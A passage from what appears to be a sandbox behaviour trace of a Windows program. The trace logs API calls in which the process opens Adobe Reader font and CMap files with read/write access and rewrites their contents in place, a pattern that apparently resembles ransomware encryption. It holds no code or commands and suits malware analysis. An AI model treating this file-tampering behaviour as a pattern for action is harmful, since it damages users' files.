hFile=0x1f8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.464] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3444 [0096.464] ReadFile (in: hFile=0x1f8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0096.465] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3444 [0096.465] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.465] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.465] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.465] CloseHandle (hObject=0x1f8) returned 1 [0096.466] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMingStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemingstd-light.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0096.466] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.466] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9b3508 [0096.466] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.466] ReleaseMutex (hMutex=0x168) returned 1 [0096.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeMingStd-Light.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeMingStd-Light.otf", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeMingStd-Light.otf", lpUsedDefaultChar=0x0) returned 22 [0096.466] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.469] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.470] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.471] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.472] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.473] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.474] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.475] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0096.476] ReadFile (in: hFile=0x1f8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0096.477] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9b1508 [0096.477] ReadFile (in: hFile=0x1f8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2fdf278*=0x2000, lpOverlapped=0x0) returned 1 [0096.479] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9b1508 [0096.482] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eef0000 [0096.490] WriteFile (in: hFile=0x1f8, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x2588, lpOverlapped=0x0) returned 1 [0096.490] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.490] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.491] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.491] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.491] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.491] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.492] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.492] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.492] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0096.492] WriteFile (in: hFile=0x1f8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0096.493] VirtualFree (lpAddress=0x7eef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.495] CloseHandle (hObject=0x1f8) returned 1 [0096.495] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.496] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V", lpFilePart=0x2fdf690*="90ms-RKSJ-V") returned 0x42 [0096.496] GetLastError () returned 0x5 [0096.496] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.496] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.496] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.496] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.496] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.496] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.496] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90ms-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90ms-rksj-v")) returned 0x20 [0096.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.497] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0", lpFilePart=0x2fdf690*="Adobe-CNS1-0") returned 0x43 [0096.497] GetLastError () returned 0x5 [0096.497] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.497] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.497] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.497] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.497] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.497] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.497] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-0")) returned 0x20 [0096.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-cid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID", lpFilePart=0x2fdf690*="Adobe-CNS1-H-CID") returned 0x47 [0096.498] GetLastError () returned 0x5 [0096.498] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.498] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.498] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.498] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.498] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.498] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.498] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-cid")) returned 0x20 [0096.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.498] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4", lpFilePart=0x2fdf690*="Adobe-GB1-4") returned 0x42 [0096.498] GetLastError () returned 0x5 [0096.498] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.498] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.499] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.499] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.499] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.499] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.499] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-4" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-4")) returned 0x20 [0096.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.848] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0", lpFilePart=0x2fdf690*="Adobe-Japan1-0") returned 0x45 [0096.848] GetLastError () returned 0x5 [0096.848] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.848] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.848] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.848] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.848] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.848] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.849] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-0" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-0")) returned 0x20 [0096.849] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90pv-rksj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.849] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ", lpFilePart=0x2fdf690*="Adobe-Japan1-90pv-RKSJ") returned 0x4d [0096.849] GetLastError () returned 0x5 [0096.849] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.849] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.849] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.849] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.849] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.850] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.850] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90pv-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90pv-rksj")) returned 0x20 [0096.850] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-cid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.850] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID", lpFilePart=0x2fdf690*="Adobe-Korea1-H-CID") returned 0x49 [0096.850] GetLastError () returned 0x5 [0096.850] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.850] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.850] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.850] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.851] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.851] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.851] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-cid")) returned 0x20 [0096.851] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.851] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C", lpFilePart=0x2fdf690*="B5pc-UCS2C") returned 0x41 [0096.851] GetLastError () returned 0x5 [0096.851] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.851] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.851] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.851] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.852] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.852] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.852] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2c")) returned 0x20 [0096.852] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.852] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-V", lpFilePart=0x2fdf690*="ETenms-B5-V") returned 0x42 [0096.852] GetLastError () returned 0x5 [0096.852] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0096.852] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.852] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.853] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0096.853] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.853] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0096.853] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 